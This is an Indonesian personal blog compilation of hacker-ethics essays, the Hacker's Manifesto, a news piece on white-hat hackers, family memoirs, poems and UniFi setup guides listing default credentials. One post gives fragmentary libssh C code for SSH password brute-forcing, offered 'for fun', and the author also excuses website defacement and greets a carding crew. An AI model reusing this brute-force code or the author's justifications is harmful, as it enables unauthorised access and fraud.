Hacker Filosofi

Filosofi adalah budaya berpikir, mencintai kebijaksanaan, mencari ilmu pengetahuan, bukankah itu sama seperti sedang melakukan akitivitas hacking? gw berpikiran seperti itu, well…pada dasar’a arah dan tujuan’a sama, oleh karena itu gw kira akan lebih baik untuk menghabiskan banyak waktu untuk belajar dan mengetahui aspek mental dari hacking itu sendiri, filosofi.

Filosofi mempunyai banyak aspek, tapi gw lebih suka memulai’a dari sebuah aspek yaitu konflik nyata antara para hacker dan non hacker : Etika. Apa yg baik, apa yg jahat. Kebaikan untuk banyak orang masuk ke dalam komputer dan mencuri informasi adalah sebuah kejahatan, merebut akses root di sebuah server adalah sebuah kejahatan, merubah tampilan website atau deface adalah sebuah kejahatan, begitukah??

Hal yg pertama gw pikirkan tentang semua itu, kita akan menyetujui dan membenarkan aksi yg dilakukan bagi kita sendiri, ga masalah mau seperti apapun, ga ada yg baik dan jahat, kita ambil contoh adalah sebuah kejahatan apabila membunuh seseorang karena lo suka membunuh, tapi lain cerita apabila lo membunuh seseorang karena dia mengancam lo dengan sebuah pistol. Adalah sebuah kejahatan apabila mencuri uang hanya karena untuk membeli jam baru, tapi ga seorangpun yg berpikir Robin Hood jahat ketika dia mencuri uang, setuju?

So, aksi yg dilakukan untuk diri’a sendiri adalah ga bisa di bilang baik dan ga bisa di bilang jahat juga, itu bisa di bilang sebuah motivasi, mari kita lihat motivasi para hacker dan apa motivasi kita? Gw ga berpikir kita dapat menyamaratakan beberapa komitmen tentang kriminal adalah rasa keingintahuan dengan segampang itu, beberapa orang di antara’a melakukan hacking karena mereka hanya ingin membuktikan, dan beberapa di antara’a melakukan kegiatan hacking hanya untuk membuat kekacauan.

Tapi apakah semua’a menjadi masalah? berpikir bahwa melakukan hacking adalah sebuah kejahatan hanya karena untuk mendapatkan ilmu pengetahuan? berpikir bahwa ga semua ilmu pengetahuan tersedia untuk setiap orang? berpikir bahwa hacking adalah makna kejahatan karena dilakukan hanya untuk pamer? After all, lo bisa melakukan aktivitas hacking, kenapa ga memperlihatkan’a pada dunia? apakah membeli perhiasan dan memakerkan itu bukanlah salah satu dari kejahatan, apakah seperti itu? Dan itu adalah kejahatan untuk membuat kekacauan? Internet adalah dunia kami, dan itu akan menjadi pilihan bagi kami dengan apa yg kami ingin lakukan, benar seperti itu?

Di lain pihak, apa kita yakin bahwa ilmu pengetahuan tersedia bagi setiap orang, hidup dapat berbahaya apabila semua informasi berasal dari public, dan memperlihatkan’a dengan kegiatan hacking akan dapat dipertimbangkan sebagai kejahatan juga, menggambar graffiti di sebuah tembok termasuk hal ilegal juga, dan tentu membuat kekacauan adalah sebuah kejahatan, sebuah dunia yg di dasari akan perintah.

Untuk terakhir, kegiatan hacking masih dapat di katakan baik dan buruk, biarkan gw mengulangi beberapa kalimat dari manifesto hacker:

————————————————————————————-

This is our world now…the world of electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn’t run by profiteering gluttons, and you call us criminals. We explore…and you call us criminals. We seek after knowledge…and you call us criminals. We exist without skin color, without nationality, without religious bias…and you call us criminals. you build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals

————————————————————————————-

kata² yg gamblang, khilaf? mari kita review, We make use of a service already existing without paying for what could be dirt-cheap if it wasn’t run by profiteering gluttons, yup, terdengar sangat jelas, apabila beberapa orang di dunia ini menolak untuk membayar line telepon mereka, untuk koneksi internet mereka, mereka akan terpuruk karena ga ada seorangpun yg dapat memperbaiki itu semua apabila ada kerusakan, bahkan sebuah layanan yg telah ada akan mereka bayar untuk menjaga’a agar tetap berjalan normal.

We explore…and you call us criminals. We seek after knowledge…and you call us criminals, terdengar ga adil, tersiksa untuk berpetualang, coba pikirkan dalam konteks: “apabila gw berpetualang dalam jaringan network sekolah, menemukan soal² ujian yg belum di berikan di sekolah, gw akan tau semua rencana² ujian sekolah.

Tapi coba lihat ini, you build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals”, ya…apa yg di katakan dalam kalimat itu benar, apa yg kita lakukan terhadap undang², apa yg kita lakukan perintah, terhadap opini yg mayoritas, tapi coba bandingkan dengan aksi² pemerintah, dengan otoritas mereka, idealisme kita sama dengan mereka, kita tau kenapa kita melakukan aktivitas hacking, dunia ini benar² sudah parah, semua orang benar² sakit, semua orang berteriak tentang keburukan kepada para hacker, kami mungkin jahat, tetapi kami ga sejahat dunia ini.

The Conscience of a Hacker

. . : : The Hacker’s Manifesto : : . .

Another one got caught today, it’s all over the papers. “Teenager
arrested in computer crime scandal”, “Hacker arrested after bank
tampering”…

Damn Kids. They’re all alike.

But did you, in your three-piece psychology and 1950’s technobrain ever
take a look behind the eyes of a hacker? Did you ever wonder what made
him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world…

Mine is a world that begins with school. I’ve listened to the teacher
explain for the fifteenth time how to reduce a fraction. I understand
it. “No, Mrs. Smith, I didn’t show my work. I did it in my head…”

Damn kid. Probably copied it. They’re all alike.

I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to do. If it makes a mistake, it’s because
I screwed up. Not because it doesn’t like me…

or feels threatened by me…

or thinks I’m a smart ass…

or doesn’t like teaching and shouldn’t be here…

Damn kid. All he does is play games. They’re all alike.

And then it happened… A door opened to a world… Rushing through the
phone line like heroin through an addict’s veins, an electronic pulse is
sent out, a refuge from the day to day incompetencies is sought… A
board is found.

“This is it… This is where I belong…”

I know everyone here… Even if I’ve never met them, never talked to
them, may never hear from them again… I know you all…

Damn kid. Tying up the phone line again. They’re all alike…

You bet your ass we’re all alike… We’ve been spoon fed baby food at
school when we hungered for steak… The bits of meat that you did let
slip through were pre-chewed and tasteless. We’ve been dominated by
sadists, or ignored by the apathetic. The few that had something to
teach found us willing pupils, but those few are like drops of water in
the desert.

This is our world now… The world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without
paying for what could be dirt cheap if it wasn’t run by profiteering
gluttons, and you call us criminals. We explore… And you call us
criminals. We exist without skin color, without nationality, without
religious bias… And you call us criminals. You build atomic bombs,
you wage wars, you murder, you cheat, and lie to us and try to make us
believe it’s for our own good, yet we’re the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that
of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never
forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can’t stop us all…

After all, We’re all alike.

+++The Mentor+++

Tanya Kenapa ??

Ada beberapa orang yg pro dan juga kontra dari apa yg pernah gw perbuat di dunia tanpa batas ini, yupz inilah hidup, ada hitam dan putih, ada salah dan benar, menangis dan tertawa, pro dan kontra, suka atau ga, gw atau siapapun harus bisa menerima hal itu.

Dikutip dari Kompas.com
Oleh Amir Sodikin

Pemilik rumah: Rumah saya dibobol maling, tolong pihak berwajib menindak pelakunya. Enggak ada yang dicolong, cuma saya malu karena tembok dicorat-coret.

Tertuduh: Saya enggak maling kok, cuma masuk halamannya saja. Saya corat-coret cuma untuk memperingatkan kalau pagar tidak dikunci.

Istilah hacker (yang baik) di Indonesia masih dirancukan dengan istilah cracker (yang jahat). Tak hanya itu, semua kegiatan yang bernuansa hacking juga dianggap haram oleh pemerintah. Padahal, “hacker putih” atau white hat hacker seharusnya dirangkul.

Tanpa disadari, potensi hacker Indonesia ternyata luar biasa. InfoKomputer, Kamis (12/6), menggelar event nasional bertajuk “Biggest Hacker’s Day Event in Indonesia”. Acara yang digelar bersamaan dengan Festival Komputer Indonesia di Jakarta Convention Center (JCC) ini ternyata banyak diminati. Ini membuktikan, keamanan web sudah menjadi bagian penting dunia kita.

Hacker sebenarnya untuk menyebut orang yang paham soal komputer, mulai software, hardware, arsitektur, hingga administrasinya. Tetapi, orang mengonotasikan hacker sebagai orang jahat yang membobol keamanan. Padahal, hacker hanya memperbaiki, mencari lubang keamanan, dan memberikan peringatan.

Tidak merusak

White hat hacker memiliki etika tidak merusak dan tidak mencuri data sensitif. Dari sisi positif, hacker ketika menemukan lubang keamanan hanya memberikan peringatan kepada pemilik web untuk meningkatkan keamanan. Jika sampai merusak, maka sebutan dia adalah cracker. Memang akhirnya muncul black hat hacker yang sering membobol sistem keamanan untuk kepentingan pribadi dan juga grey hat hacker yang menyuplai (menjual) informasi keamanan kepada vendor dan juga cracker.

“Tahun depan ada pemilu, kita harus membahas masalah keamanan web ini dari sisi positif. Hacker bisa menjadi mitra yang baik,” kata BM Adam, Pemimpin Redaksi InfoKomputer.

Pengamat masalah keamanan web, Anselmus Ricky, atau di dunia maya dikenal dengan nick Th0R, mengatakan, Indonesia punya banyak potensi orang hebat. Namun, masalah keamanan website masih menjadi kendala.

“Hacker’s Day ini terinspirasi dari forum di Amerika Serikat yang memfasilitasi berbagai pihak untuk membahas kasus-kasus baru soal keamanan. Ini bukan ajang kumpul hacker, tetapi juga membahas cyber law,” katanya.

Wakil Ketua Indonesia Security Incident Response Team on Internet Infrastrucure (ID-SIRTII) Muhammad Salahuddien mengatakan, banyak ancaman keamanan yang datang dari Indonesia. ”Tetapi kita sendiri masih lemah mengatasinya,” katanya.

Di forum-forum internasional, mereka sering mengeluhkan ancaman-ancaman itu yang datang dari Indonesia, mulai dari bentuk virus hingga serangan untuk membobol keamanan.

Kini mulai bermunculan forum dan workshop soal keamanan teknologi informasi. Beberapa di antaranya bahkan menghadirkan pembicara-pembicara yang masih SMA. Karena itu, ID-SIRTII berjanji akan membuat jadwal acara-acara seperti itu agar masyarakat bisa mengikutinya.

Potensi besar

Coordinator of ICT & IS Department Swiss German University-Asia, James Purnama, mengatakan, banyak fakta mengejutkan dari kegiatan cracking. Rata-rata dilakukan anak SMA dan mahasiswa. “Kita harus segera bisa menggandeng lembaga yang bisa memfasilitasi mereka, misalnya lembaga sertifikasi,” katanya.

Lembaga sertifikasi bisa memberikan sertifikasi hacker yang beretika. “Dengan cara ini, potensi mereka tak terbuang dan tak mengarah kriminal. Mereka akan menjadi penjaga server, bukan lagi penyerangnya,” katanya.

Tin Tin Hadijanto dari lembaga sertifikasi EC Council mengatakan, lembaganya kini mengeluarkan sertifikasi bagi hacker yang beretika. “Kami dari lembaga pendidikan, tugas kami membangun kesadaran soal keamanan dari level sederhana hingga level ahli,” kata Tin Tin.

“Hacker putih (whitehat)” jasanya bisa dipakai oleh perusahaan untuk menjaga server. Mereka bahkan bisa menjadi konsultan perusahaan-perusahaan untuk meningkatkan keamanan, membuat software, atau membuat sistem.

Ketua ID-SIRTII Richardus Eko Indrajit mengatakan, dari sisi sumber daya, Indonesia potensial menjadikan security management sebagai “brand” andalan lulusan sarjana Indonesia. “Dengan berbagai kompetisi hacker yang sering dimenangi Indonesia, kita bisa bilang: kalau mau cari ahli security, carilah lulusan Indonesia,” katanya.

Sudut pandang

Bagi pemilik web, pembobolan situs adalah peristiwa kriminal yang perlu dilaporkan polisi. Tetapi, sebenarnya, mengumumkan bahwa situsnya dibobol sebenarnya hal memalukan karena menunjukkan lemahnya pertahanan gara-gara “lupa mengunci pagar”.

Sudut pandang dunia cyber dari dunia nyata memang berbeda. Di dunia cyber, pembobolan situs yang disertai dengan meninggalkan jejak nama (misalnya Hacked by bla bla bla) justru akan membuka mata untuk meningkatkan keamanan.

Berterima kasihlah kepada mereka yang telah meng-hack situs Anda dengan santun. Perusahaan harus tahu bagaimana meningkatkan keamanan. Jadi, jangan hanya menyalahkan para pembobol web jika memang keamanan yang dimiliki jelek.

Ga perlu sebuah pembelaan untuk diri gw sendiri, silakan berargumen tentang apa yg pernah gw perbuat.

My Mom Is Crying When Im Gone

Ibu yg gw pikir orang’a konserfativ, ibu yg selalu bawel dan sering marah² molo ke gw, ternyata mengeluarkan airmata juga saat gw harus pergi ninggalin beliau dan keluarga dalam jangka waktu yg lama bahkan dalam waktu yg ga bisa di tentukan, sedih banget saat dia meluk gw di ruang makan, mencium kening gw, mengelus kepala gw, dan bilang ibu berat banget harus di tinggalin sama kamu.
Ga henti²a beliau mengeluarkan airmata, saat itu gw ga tau harus gimana lagi, ga mungkin lagi gw harus terus bertahan, mau gimanapun gw harus tetap pergi, dan hingga beliau bantuin gw packing baju, dia masih tetap menangis…

lagu dari No Use For A Name – Check For A Pulse masih terus terdengar dari speaker aktif komputer di playlist dan terus mengulang, 1 bungkus rokok mild masih tetap setia menemani gw di ruang makan sambil terus merenung dan menahan sedih. Ga ada lagi perasaan paling bersalah selain ketika nyokap gw menunggu dirumah menanti gw pulang dari Bali karena sakit yg gw derita waktu itu dan teryata gw ga kunjung datang, yg ada di Lampung gw malah nginep di suatu tempat, sumpah dan ga nyangka banget ketika beliau ngomong saat itu dia khawatir banget dan sering nangis gara² sakit yg gw derita, damn !! anak macam apa gw ini !!
09.50 pm terdengar suara mobil dari luar rumah, dan gw yakin banget itu pasti bokap gw, pulang dari kantor dengan wajah letih dan langsung mengajak gw ngobrol sebentar buat ngasih nasehat, ga terlihat perasaan sedih dari bokap gw, tapi raut wajah’a memperlihatkan rasa kehilangan yg sangat besar, ga pernah menitikan airmata di depan anak²nya tapi gw tau hati beliau pasti menangis, Bapak yg galak yg gw kenal waktu gw masih sekolah dulu, tapi cukup bijaksana setelah gw lulus sekolah, yupz, that’s my dad and also my hero, maafin klo ga pernah jadi anak yg belum bisa bikin bapak banggain.

12.15 am gw siap² untuk berangkat ke jakarta, masih jelas terlihat nyokap yg terus mengusap airmatanya dengan sapu tangan, airmatanya tetap menetes ga berhenti², matanya yg mulai keliatan membengkak karena terus²an nangis, titipan terakhir dari beliau sebelom gw pergi meninggalkan rumah adalah kain sarung dan sajadah, untuk terakhir kalinya dengan wajah senyum kehilangan dan beliau bilang dengan sedikit intonasi suara bercanda…
“yaaah mas rangga pergi ninggalin ibu deh… kamu jangan lupa sholat yach nak disana, ibu doain kamu dari sini biar jadi orang sukses, klo kamu ada waktu jangan lupa hubungin ibu, ibu pasti kangen kamu…” dan terakhir dia memeluk gw dengan erat dan mencium kening gw untuk ke 2x’a

21.06.08 – 13.45pm dari bandara Raden Inten II Lampung gw udah harus berangkat untuk waktu yg bener² cukup lama, mungkin ini adalah pelajaran buat gw sekaligus latihan mental buat gw untuk jauh dari orang tua, dan gw yakin entah kapan, gw ataupun orangtua gw pasti bakal ada yg pergi se’lama²nya buat ninggalin salah satu dari keluarga gw, dan mungkin juga dengan gw jauh dari orangtua, membiayai diri sendiri dari hasil jerih payah gw sendiri, berjuang hidup sendiri tanpa meminta bantuan sedikitpun dari mereka, kelak hari esok gw akan menjadi seseorang yg lebih tegar ketika saatnyaa benar² tiba untuk mereka ninggalin gw dari dunia ini.
Dedicated For my Lovely parents

Karma

Karma, jatuhkan pada dosa yang tereja
Tangan tangan keadilan menghukum perilaku durjana
Aku sang penikmat kepulan asap jelaga
Serbuk narkotika haram dunia
atas luka luka jarum pintu ilusi mimpi asa
padaku stempel di kening itu ada
pecandu napza

letupan pengab sudut sudut relung gelap jiwa
menghamba pada ‘Tuhan’ serbuk cairan nista
hingga jernih pikir sirna dilahap setan setan suara
hunjam lekat isi rasio kepala
menusuk suci hati sisakan puing substansi rasa
renggut jiwa sukma yang terlupa

nasibku kian tercekat
oleh semu nikmat aroma pil serbuk mudarat
terkapar pesona rayuan setan penghamba jahat
satu demi satu sel tubuhku sekarat
berkeping keping dicumbu ruh ruh jahat

apa yang layak perbuat?
saat dunia tak lagi ramah bersahabat
pada kami berlabel manusia tak bermartabat
terbeli oleh adiksi narkoba laknat
jelmakan hidup kelam hitam pekat
hingga cibiran runcing berkelebat setiap saat
meski pintu tlah terbuka taubat

aku ingin pulih!
aku bukan sampah!
aku manusia!
aku punya cita cita!
aku korban keji peradaban!
aku bukan penghuni penjara!

lalu, tebusan apa yang pantas kugadaikan
hingga keterasingan ini menyingkir dari hadapan
masa lalu hitam telah kuhancurkan
memori kelam tlah aku hapuskan
bersama segenggam manis mulia harapan
percayakan waktu untuk niat pembuktian
tidakkah aku berkesempatan untuk menjadi lebih baik !! 🙂

Memasang SSL Pada Unifi Controller (linux)

Wokay gengs, Kali ini gw akan sharing bagaimana memasang ssl pada unifi controler yang berjalan di linux dengan menggunakan Keystore Explorer. sebelum mulai, gw harap lo sudah memiliki SSL yang lo order , untuk sharing sedikit disini gw menggunakan ssl dari RapidSSL. file ssl yang harus lo siapkan :

ssl key
ssl certificate domain
ssl Intermediate CA (RapidSSL)
ssl Root CA (Geotrust)

Download Keystore Explorer di keystore-explorer.org/downloads.html

Jika sudah silahkan login ke unifi controler dan download file keystore pada folder unifi :

# /usr/lib/unifi/data/keystore

jika udah lo download, berarti file yang harus disiapin lagi adalah :

ssl domain key
ssl domain certificate
ssl Intermediate CA (RapidSSL)
ssl Root CA (Geotrust)
keystore

Jika lo sudah punya semua, silahkan buka keystore explorer.

pilih open an existing keystore, lo bakal diminta masukan password, silahkan masukan password keystore unifi  “ aircontrolenterprise ”

tampilan saat keystore unifi dibuka.

Kemudian klik tools > import key pair > Open SSL

Silahkan input domain.key yang udah lo buat dan certificate domain lo yang telah lo beli pada pihak penyedia SSL, selanjutnya klik import.

Setelah lo import akan muncul permintaan untuk membuat alias key pair, isikan ” unifi ” dan klik ok.

Silahkan klik yes. Enter new password , kosongkan kemudian klik ok.

Selanjutnya import Intermediate dan Root CA. Pilih Tools > Import Trusted Certificate

Setelah intermediate certificate sudah di import, import Root CA dengan cara sama seperti import intermediate CA certificate. Tools > Import Trusted Certificate

Oke sampai disini selesai masang sertifikat ssl domain kita, selanjut save file , file > save.

upload file keystore yang baru di modifikasi ke unifi controler, upload pada folder /usr/lib/unifi/data/

# /usr/lib/unifi/data/

Selanjutnya restart unifi controler lo gengs :

# service unifi restart

Sampai disini SSL lo telah terpasang. Gimana mudah kan ?

Mengenal SSH

SSH atau secure shell adalah aplikasi pengganti remote login seperti telnet, rsh, dan rlogin semacam dengan vnc atau remote desktop, yang jauh lebih aman. Bedanya ssh digunakan buat meremote komputer secara command line interface (text mode) atau dengan lebih jelasnya seperti bermain dengan command prompt pada operating system windows sehingga kinerjanya tentu akan lebih cepat dan gesit.

Dikembangkan pertamakali oleh OpenBSD project dan kemudian versi rilis p (port) di manage oleh team porting ke sistem operasi lainnya, termasuk sistem operasi Linux. Fungsi utama aplikasi ini adalah untuk mengakses mesin secara remote

Dengan SSH, semua percakapan antara server dan klien di enkripsi. Artinya, apabila percakapan tersebut disadap, penyadap tidak mungkin memahami isinya. Bayangkan klo seandainya lo lagi maintenance server dari jauh, tentunya dengan account yang punya hak khusus, tanpa sepengetahuan lo, account dan password tersebut disadap orang lain, kemudian server lo diobrak-abrik

Algoritma enkripsi yang didukung oleh SSH di antaranya BlowFish (BRUCE SCHNEIER), Triple DES (Pengembangan dari DES oleh IBM), IDEA (The International Data Encryption Algorithm), dan RSA (The Rivest-Shamir-Adelman). Dengan berbagai metode enkripsi yang didukung oleh SSH, lo bisa mengganti’a dengan cepat klo salah satu algoritma yang lo bikin mengalami gangguan

Gw pikir pasti lo berpikir klo SSH itu ga bisa di crack, klo lo berpikir seperti itu lo salah besar !! ingatlah kawan, bahwa ga ada system yang aman 100%, semua buatan manusia pasti ada kelemahannya, klo kata temen gw anak surabayahackerlink banyak jalan untuk menuju neraka hei sobat. :p

Kita lakukan dengan teknik brute force, gw harap istilah brute force dan password guessing ga perlu lagi dipermasalahin, bagi yang belom tau apa itu brute force or password guessing silakan cari sendiri pengertiannya di mamang google

Bahan yang di perlukan:
1. Rokok Marlboro 1 bungkus
2. Teh Botol 1 krat
3. Snack and music player, buat cemilan klo lagi stuck
4. Dictionary attack, download aja di situs² hacker
5. Komputer pastinya, lah klo gada ini mo cracking pake kompor?
6. libssh.h silakan cari lagi di mamang google

sedikit source code dari libssh.h buat contoh aja :

#define AUTH_SUCCESS 0

/* in client.c */

SSH_SESSION *ssh_connect(SSH_OPTIONS *options);
void ssh_disconnect(SSH_SESSION *session);

/* in options.c */

SSH_OPTIONS *ssh_getopt(int *argcptr, char **argv);
void options_set_username(SSH_OPTIONS *opt,char *username);
void options_set_host(SSH_OPTIONS *opt, const char *host);
void options_set_port(SSH_OPTIONS *opt, unsigned int port);

/* in auth.c */

int ssh_userauth_password(SSH_SESSION *session,char *username,char *password);

sisanya compile sendiri pake gcc dan cari sendiri file libssh.h dan file² *.c yang dibutuhin. Sekarang tinggal mengimplementasikan fungsi² diatas pada ssh brute force yang bakal kita rakit codenya

#include 
#include 
#define PORT 22

void checkauth(char *user, char *password, char *host)
{
SSH_SESSION *session;
SSH_OPTIONS *options;
int argc=1;
char *argv[]={“none”};

options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
options_set_port(options,PORT);
session=ssh_connect(options);
if(!session) return ;

if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
{
printf(“%s:%s:%s -> BaD Password\n”,user,password,host);
ssh_disconnect(session);
return;
}else{
printf(“%sManteb juragan.Coba ini : %s:%s:%s\n”,warn,user,password,host);
}
}

Let’s compile and hack for fun !!

Mom i miss you…

8 Novermber 2018 01.27am cempaka putih, di depan komputer sambil browsing di exploit-db, youtube yg masih terus memutar lagu² dari Ellegarden.

teringat kemaren saat chatting ma seorang cewe metalcore, berawal dari tanya² tentang koleksi album metal yg dia punya, dan tanpa sengaja menurut gw pembicaraan malah jadi ga enak, gw salah besar dan merasa bersalah banget ma dia, kenapa sih gw harus tanya² tentang nyokap dia !!

“and she’s said my mother was r.i.p (rest in peace) when im graduating senior hi school”

yg lebih parah lagi saat gw tanya kapan nyokap’a dia tidur buat se-lama²nya untuk ninggalin dia? dan dia bilang… “masih baru ko pas gw lulus sekolah taon 2012”, kebayang ga sih lo dari taon 2012 sampai sekarang taon 2018 itu kan waktu yg cukup lama, dan dia bilang taon 2012 kmaren itu masih baru.

sejenak berfikir di otak gw klo dia bener² menyimpan rasa kangen yg luar biasa ma sang bunda, damn !! ancur perasaan gw saat dia ngomong seperti itu, mendadak selera chatting gw saat itu bener² hilang, mungkin klo bahasa komputer’a shutdown with no wait kali ye, satu hal…biar se-metal dan se-jantan apapun diri gw, tetap ga munafik klo gw cuma seorang manusia biasa yg masih punya sisi halus.

Dan gw yakin…seandai’a dia di kasih satu kesempatan lagi bertemu nyokap’a oleh tuhan walaupun hanya satu menit, tanpa satu kalimat pun yg bisa dia ucapkan buat nyokap’a, dia bakal langsung memeluk erat² sang bunda tercinta sambil menangis mengeluarkan semua rasa kehilangan yg selama ini dia pendam jauh dari lubuk hati’a yg paling dalam (sial, gw jadi pengen nangis nulis’a), yah… pikiran seperti itu tercipta dengan insting gw sebagai seorang anak

Dan gw benci dengan keadaan saat dimana seseorang yg gw sayang pergi meninggalkan gw… tapi gw ga bisa berbuat banyak dan harus gw akuin… “pertemuan adalah awal dari sebuah perpisahan”

Maaf… gw gada maksud buat membuka lembaran² lama lo dan mengingatkan lo pada masa² yg indah saat bersama bunda lo tercinta… jadi inget kata² lo waktu itu : biarkan beliau tenang di sana

Mom…hope you rest in peace there

Setting IP Unifi Switch via SSH

Kali ini saya akan berbagi cara setting IP unifi switch melalui ssh.

Oke langkah pertama adalah saya merubah IP Switch Unifi yang default adalah 192.168.1.20, ke IP satu Network dengan Unifi Controller agar dapat di adoption. Kita menggunakan ssh, silahkan bisa menggunaka putty untuk sshnya.

IP Unifi Default : 192.168.1.20
Port : 22

Login dengan :

 User : ubnt

 password : ubnt

untuk merubah IP silahkan ketik perintah berikut :

 # vi  /etc/udhcpc/udhcpc

 edit file dengan menekan huruf ” i ” pada keyboard.

Rubah IP pada Line yang seperti dibawah ini :

 UDHCPC_FALLBACK_IP=”192.168.2.30″

 UDHCPC_FALLBACK_NETMASK=”255.255.255.0″

 Setelah dirubah, silahkan esc pada keyboard ketik :wq untuk keluar edit.

Oke selanjutnya buka controller, dan adoption Unifi Switchnya.

* Next Vlan pada Unifi Switch 🙂

Gw ga ingin menemui hari esok

Tulisan ini gw buat dengan se’benar²nya, semua content yg gw tulis disini adalah sebuah kenyataan apa yg gw alami dan rasakan saat ini tanpa ada maksud lain atau mencari simpatik dan empati dari seseorang dan juga bukan untuk mendramatisir keadaan, sebelom gw ngelanjutin tulisan ini lebih jauh, gw mo berterima kasih buat coconet crew dan yogyacarderlink team, maafin klo gw udah banyak ngerepotin lo semua, you all the best friends i ever had guys !! buat kedua orang tua gw, maafkan anakmu klo selama ini blom bisa bikin bangga tapi selalu bikin kecewa.

27 Agustus 2011, sore itu di ruang unit gawat darurat sleman jogja utara di temenin Idiot_insidE dan _vallent, dokter bilang, maaf, saya ga bisa berkata banyak pada anda, saya ga tau entah sampai kapan anda bisa bertahan, but you will never get healthy from this disease, dan saya juga bukan tuhan, mungkin ada cara untuk memperlambat tp ga bisa menghentikan ini, anda harus terapi 3 bulan, hancur perasaan gw saat denger apa yg di ucapkan sang dokter, dengan kepala yg tertunduk menyembunyikan semua rasa kesedihan gw di depan sang dokter, gw desperate banget, dan gw sadar biaya terapi selama 3 bulan itu cukup besar, jadi gw ga mungkin mampu buat itu semua, terlebih gw udah ga mau lagi nyusahin orangtua gw, cukup sudah pengorbanan mereka untuk gw saat gw di rawat selama 5 hari di rumah sakit gara² types dan demam berdarah menghabiskan biaya 7 juta lebih, gw rasa kasih sayang dan pengorbanan mereka selama ini buat gw udah cukup dan gw harus tau diri, mom.. dad.. i love you all… kalian ga akan pernah bisa tergantikan di hati gw.

apakah emang harus kya gini yach jalan hidup gw? bukan’a gw ga percaya sama pencipta gw, tapi saat ini siapa lagi yg bisa gw pegang omongan’a selain dokter itu, tapi klo ini emang bener² terjadi ga banyak yg bisa gw lakukan selain berdoa dan meminta maaf pada orang² yg pernah gw sakitin, lebih baik gw ngucapin dari sekarang daripada semua’a terlambat dan ga pernah ada lagi satu kalimat pun yg bisa keluar dari mulut gw, gw sadar banget dosa gw terlalu banyak.

maafin gw apabila kemaren² gw pernah nyakitin perasaan kalian semua, yang di sengaja maupun yg ga di sengaja, buat semua orang² yg ga suka sama gw dan benci gw, ya..ya..ya.. gw akuin lo lebih hebat daripada gw, untuk bantal kesayangan gw dari kecil, gw selalu ga bisa tidur dan merasa kehilangan tanpa lo, tapi saat waktu’a tiba lo harus kehilangan gw bantalku, gopar makasih buat doa’a, bung panggi, gw pengen banget kita ketemu dan tanding di acara kompetisi hacking indonesia, and friendster group hacker indonesia, lo semua hebat bro !! gw salut, keep fighting yaw !! buat engkus dan IT y.a.i chaos class, lo semua konyol, gw suka canda lo semua.

benni coco crew, makasih sob for jakarta night experience and life sharing, juga udit a.k.a when angel cry blood, keep deface and dont forget our dreams at chat, tukulesto dan t-bone yg selalu ngebantu gw dan selalu gw bikin repot, makacih yaw pertolongan’a, LeQhi,lingah,Idiot_IndsidE,_vallent, gw yakin yogyacarderlink bakal jadi underground hacker team yg hebat, cc please dunk kaka, qe³… for someone out there, kamu jaga diri baik² yach, aku sayang kamu dan ga akan pernah berubah untuk kamu, akankah semua’a berbalik jadi one day for ***** off

setelah apa yg gw jelasin di atas, gw ga mau lagi ada seorangpun menanyakan gw kenapa dan sakit apa, entah tatap muka langsung or via chat, klo lo masih tetap bersikeras nanyain hal itu, lo bakal tau sendiri resiko apa yg bisa gw perbuat dan terjadi sama lo real or unreal, inti’a jangan pernah mencoba untuk mengerti gw, klo lo melakukan’a, lo ga akan pernah mendapatkan apa² dari gw, klo ada yg mo di tanyain tentang dunia komputer dan hacking lebih baik datang aja langsung ke coconet crew atau join ke chan yogyacarderlink, di sana banyak orang² hebat yg bisa lo ajak sharing tentang dunia IT, gw harap setelah penjelasan ini semua gada lagi yg di tanyain ke gw, enough… untuk blog ini sebisa mungkin gw akan update hingga jari gw ga bisa lagi mengetikan satu huruf pun.

tommorow may be im gone, but not forgotten, apabila gw di kasih satu permintaan yg bisa di kabulkan sama tuhan, gw cuma mau…

Menghentikan waktu dan Gw ga ingin menemui hari esok…